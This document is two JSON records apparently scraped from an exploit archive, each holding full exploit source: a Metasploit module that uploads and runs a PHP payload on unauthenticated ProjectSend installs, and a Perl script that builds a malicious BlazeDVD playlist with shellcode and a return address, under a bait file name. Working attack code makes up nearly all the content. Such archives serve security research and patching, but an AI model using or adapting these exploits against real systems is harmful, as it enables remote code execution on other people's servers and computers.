{"type": "zdt", "lastseen": "2016-04-20T02:13:19", "bulletinFamily": "exploit", "cvelist": [], "history": [], "title": "ProjectSend Arbitrary File Upload Exploit", "published": "2014-12-30T00:00:00", "href": "http://0day.today/exploit/description/23041", "cvss": {"vector": "NONE", "score": 0}, "description": "This Metasploit module exploits a file upload vulnerability in ProjectSend revisions 100 to 561. The 'process-upload.php' file allows unauthenticated users to upload PHP files resulting in remote code execution as the web server user.", "hash": "5bde01a7d6fdfdc1390a8a2fdec40fd84c687c04987e69eb5035a316a5069a29", "references": [], "objectVersion": "1.0", "edition": 1, "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'ProjectSend Arbitrary File Upload',\r\n 'Description' => %q{\r\n This module exploits a file upload vulnerability in ProjectSend\r\n revisions 100 to 561. The 'process-upload.php' file allows\r\n unauthenticated users to upload PHP files resulting in remote\r\n code execution as the web server user.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Fady Mohammed Osman', # Discovery and Exploit\r\n 'Brendan Coles <bcoles[at]gmail.com>' # Metasploit\r\n ],\r\n 'References' =>\r\n [\r\n ['EDB', '35424']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\x00\"\r\n },\r\n 'Arch' => ARCH_PHP,\r\n 'Platform' => 'php',\r\n 'Targets' =>\r\n [\r\n # Tested on ProjectSend revisions 100, 157, 180, 250, 335, 405 and 561 on Apache (Ubuntu)\r\n ['ProjectSend (PHP Payload)', {}]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Dec 02 2014',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'The base path to ProjectSend', '/ProjectSend/'])\r\n ], self.class)\r\n end\r\n\r\n #\r\n # Checks if target upload functionality is working\r\n #\r\n def check\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, 'process-upload.php')\r\n )\r\n if !res\r\n vprint_error(\"#{peer} - Connection timed out\")\r\n return Exploit::CheckCode::Unknown\r\n elsif res.code.to_i == 404\r\n vprint_error(\"#{peer} - No process-upload.php found\")\r\n return Exploit::CheckCode::Safe\r\n elsif res.code.to_i == 500\r\n vprint_error(\"#{peer} - Unable to write file\")\r\n return Exploit::CheckCode::Safe\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /<\\?php/\r\n vprint_error(\"#{peer} - File process-upload.php is not executable\")\r\n return Exploit::CheckCode::Safe\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /sys\\.config\\.php/\r\n vprint_error(\"#{peer} - Software is misconfigured\")\r\n return Exploit::CheckCode::Safe\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /jsonrpc/\r\n # response on revision 118 onwards includes the file name\r\n if res.body && res.body =~ /NewFileName/\r\n return Exploit::CheckCode::Vulnerable\r\n # response on revisions 100 to 117 does not include the file name\r\n elsif res.body && res.body =~ /{\"jsonrpc\" : \"2.0\", \"result\" : null, \"id\" : \"id\"}/\r\n return Exploit::CheckCode::Appears\r\n elsif res.body && res.body =~ /Failed to open output stream/\r\n vprint_error(\"#{peer} - Upload folder is not writable\")\r\n return Exploit::CheckCode::Safe\r\n else\r\n return Exploit::CheckCode::Detected\r\n end\r\n else\r\n return Exploit::CheckCode::Safe\r\n end\r\n end\r\n\r\n #\r\n # Upload PHP payload\r\n #\r\n def upload\r\n fname = \"#{rand_text_alphanumeric(rand(10) + 6)}.php\"\r\n php = \"<?php #{payload.encoded} ?>\"\r\n data = Rex::MIME::Message.new\r\n data.add_part(php, 'application/octet-stream', nil, %(form-data; name=\"file\"; filename=\"#{fname}\"))\r\n post_data = data.to_s\r\n print_status(\"#{peer} - Uploading file '#{fname}' (#{php.length} bytes)\")\r\n res = send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, \"process-upload.php?name=#{fname}\"),\r\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\r\n 'data' => post_data\r\n )\r\n if !res\r\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\r\n elsif res.code.to_i == 404\r\n fail_with(Failure::NotFound, \"#{peer} - No process-upload.php found\")\r\n elsif res.code.to_i == 500\r\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /Failed to open output stream/\r\n fail_with(Failure::NotVulnerable, \"#{peer} - Upload folder is not writable\")\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /<\\?php/\r\n fail_with(Failure::NotVulnerable, \"#{peer} - File process-upload.php is not executable\")\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /sys.config.php/\r\n fail_with(Failure::NotVulnerable, \"#{peer} - Software is misconfigured\")\r\n # response on revision 118 onwards includes the file name\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /NewFileName/\r\n print_good(\"#{peer} - Payload uploaded successfully (#{fname})\")\r\n return fname\r\n # response on revisions 100 to 117 does not include the file name\r\n elsif res.code.to_i == 200 && res.body =~ /{\"jsonrpc\" : \"2.0\", \"result\" : null, \"id\" : \"id\"}/\r\n print_warning(\"#{peer} - File upload may have failed\")\r\n return fname\r\n else\r\n vprint_debug(\"#{peer} - Received response: #{res.code} - #{res.body}\")\r\n fail_with(Failure::Unknown, \"#{peer} - Something went wrong\")\r\n end\r\n end\r\n\r\n #\r\n # Execute uploaded file\r\n #\r\n def exec(upload_path)\r\n print_status(\"#{peer} - Executing #{upload_path}...\")\r\n res = send_request_raw(\r\n { 'uri' => normalize_uri(target_uri.path, upload_path) }, 5\r\n )\r\n if !res\r\n print_status(\"#{peer} - Request timed out while executing\")\r\n elsif res.code.to_i == 404\r\n vprint_error(\"#{peer} - Not found: #{upload_path}\")\r\n elsif res.code.to_i == 200\r\n vprint_good(\"#{peer} - Executed #{upload_path}\")\r\n else\r\n print_error(\"#{peer} - Unexpected reply\")\r\n end\r\n end\r\n\r\n #\r\n # upload && execute\r\n #\r\n def exploit\r\n fname = upload\r\n register_files_for_cleanup(fname)\r\n exec(\"upload/files/#{fname}\") # default for r-221 onwards\r\n unless session_created?\r\n exec(\"upload/temp/#{fname}\") # default for r-100 to r-219\r\n end\r\n end\r\nend\n\n# 0day.today [2016-04-20] #", "id": "1337DAY-ID-23041", "sourceHref": "http://0day.today/exploit/23041", "modified": "2014-12-30T00:00:00", "reporter": "metasploit", "enchantments": {"vulnersScore": 9.0}}

{"result": {"zdt": [{"lastseen": "2016-04-20T01:01:53", "references": [], "edition": 1, "description": "Exploit for unknown platform in category remote exploits", "reporter": "LiquidWorm", "published": "2008-08-10T00:00:00", "type": "zdt", "title": "BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit", "objectVersion": "1.0", "bulletinFamily": "exploit", "cvelist": [], "modified": "2008-08-10T00:00:00", "id": "1337DAY-ID-9236", "href": "http://0day.today/exploit/description/9236", "sourceData": "=============================================================\r\nBlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit\r\n=============================================================\r\n\r\n#!/usr/bin/perl\r\n#\r\n# Title: BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit (PoC)\r\n#\r\n# Summary: BlazeDVD is leading powerful and easy-to-use DVD player software.\r\n# It can provide superior video and audio(Dolby) quality, together with other\r\n# enhanced features:e.g. recording DVD,playback image and DV,bookmark and image\r\n# capture.etc.Furthermore, besides DVD,Video CD,Audio CD, BlazeDVD supports DIVX,\r\n# MPEG4, RM, QuickTime, WMV, WMV-HD, MacroMedia Flash and any other video file\r\n# you have the codec installed for.The DVD player software can be extensive\r\n# compatible with hardware,which is operated stable,smoothly under Windows98,\r\n# 98SE, Me, 2000, XP, VISTA.\r\n#\r\n# Product web Page: http://www.blazevideo.com/dvd-player/index.htm\r\n#\r\n# Desc: BlazeDVD 5.0 suffers from buffer overflow vulnerability that can be\r\n# exploited via crafted PLF playlist file localy and remotely. It fails to\r\n# perform boundry checking of the user input file, allowing the EIP to be\r\n# overwritten, thus, controling the next insctruction of the software. After\r\n# succesfull exploitation, calc.exe will be executed. Failed attempts will\r\n# result in Denial Of Service (DoS).\r\n#\r\n# WinDgb(output):\r\n#\r\n# - (4d8.f80): Access violation - code c0000005 (first chance)\r\n# - First chance exceptions are reported before any exception handling.\r\n# - This exception may be expected and handled.\r\n# - eax=00000001 ebx=77f6c15c ecx=04bd0ba8 edx=00000042 esi=01beffc0 edi=6405565c\r\n# - eip=41414141 esp=0012f188 ebp=01befcf8 iopl=0 nv up ei pl nz ac pe nc\r\n# - cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010216\r\n# - 41414141 ?? ???\r\n#\r\n#\r\n# Tested on Microsoft Windows XP SP2 (English)\r\n#\r\n# Vulnerability discovered by: Parvez Anwar and Greg Linares\r\n#\r\n# Refs:\r\n#\r\n# - http://secunia.com/advisories/23041/\r\n# - http://www.frsirt.com/english/advisories/2006/4764\r\n# - http://xforce.iss.net/xforce/xfdb/30567\r\n# - http://osvdb.org/30770\r\n# - http://www.securityfocus.com/bid/21337/\r\n# - http://www.milw0rm.com/exploits/2880\r\n#\r\n# Exploit coded by Gjoko 'LiquidWorm' Krstic\r\n#\r\n# liquidworm@gmail.com\r\n#\r\n# http://www.zeroscience.org\r\n#\r\n# 08.08.2008\r\n#\r\n\r\nprint \"\\n|==================================================================|\\n\";\r\nprint \"| |\\n\";\r\nprint \"| BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit |\\n\";\r\nprint \"| by LiquidWorm <liquidworm [at] gmail.com> |\\n\";\r\nprint \"| |\\n\";\r\nprint \"|==================================================================|\\n\\n\";\r\n\r\n$nop = \"\\x90\" x 96;\r\n\r\n\r\n# win32_exec EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com\r\n\r\n$shellcode = \"\\x29\\xc9\\x83\\xe9\\xdd\\xd9\\xee\".\r\n\t \"\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\".\r\n\t \"\\x13\\x7d\\xe6\\xe7\\x4e\\x83\\xeb\".\r\n\t \"\\xfc\\xe2\\xf4\\x81\\x0e\\xa3\\x4e\".\r\n\t \"\\x7d\\xe6\\x6c\\x0b\\x41\\x6d\\x9b\".\r\n\t \"\\x4b\\x05\\xe7\\x08\\xc5\\x32\\xfe\".\r\n\t \"\\x6c\\x11\\x5d\\xe7\\x0c\\x07\\xf6\".\r\n\t \"\\xd2\\x6c\\x4f\\x93\\xd7\\x27\\xd7\".\r\n\t \"\\xd1\\x62\\x27\\x3a\\x7a\\x27\\x2d\".\r\n\t \"\\x43\\x7c\\x24\\x0c\\xba\\x46\\xb2\".\r\n\t \"\\xc3\\x4a\\x08\\x03\\x6c\\x11\\x59\".\r\n\t \"\\xe7\\x0c\\x28\\xf6\\xea\\xac\\xc5\".\r\n\t \"\\x22\\xfa\\xe6\\xa5\\xf6\\xfa\\x6c\".\r\n\t \"\\x4f\\x96\\x6f\\xbb\\x6a\\x79\\x25\".\r\n\t \"\\xd6\\x8e\\x19\\x6d\\xa7\\x7e\\xf8\".\r\n\t \"\\x26\\x9f\\x42\\xf6\\xa6\\xeb\\xc5\".\r\n\t \"\\x0d\\xfa\\x4a\\xc5\\x15\\xee\\x0c\".\r\n\t \"\\x47\\xf6\\x66\\x57\\x4e\\x7d\\xe6\".\r\n\t \"\\x6c\\x26\\x41\\xb9\\xd6\\xb8\\x1d\".\r\n\t \"\\xb0\\x6e\\xb6\\xfe\\x26\\x9c\\x1e\".\r\n\t \"\\x15\\x16\\x6d\\x4a\\x22\\x8e\\x7f\".\r\n\t \"\\xb0\\xf7\\xe8\\xb0\\xb1\\x9a\\x85\".\r\n\t \"\\x86\\x22\\x1e\\xc8\\x82\\x36\\x18\".\r\n\t \"\\xe6\\xe7\\x4e\";\r\n\r\n\r\n$ret = \"\\x78\\x53\\xbe\\x01\";\r\n\r\n$payload = $nop.$shellcode.$ret;\r\n\r\nopen(plf, \">./The_Dark_Knight.plf\");\r\n\r\nprint plf \"$payload\";\r\n\r\nprint \"\\n--> Playlist: The_Dark_Knight.plf succesfully created...Enjoy!\\n\\n\";\r\n\r\nprint \"\\n...t00t w00t!\\n\\a\\n\";\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "sourceHref": "http://0day.today/exploit/9236", "cvss": {"score": 0, "vector": "NONE"}, "hash": "bfe30009e78411e9319d5814538d78e72fcdd3cbaf8bc1a6e5eeaea0e513324c"}]}}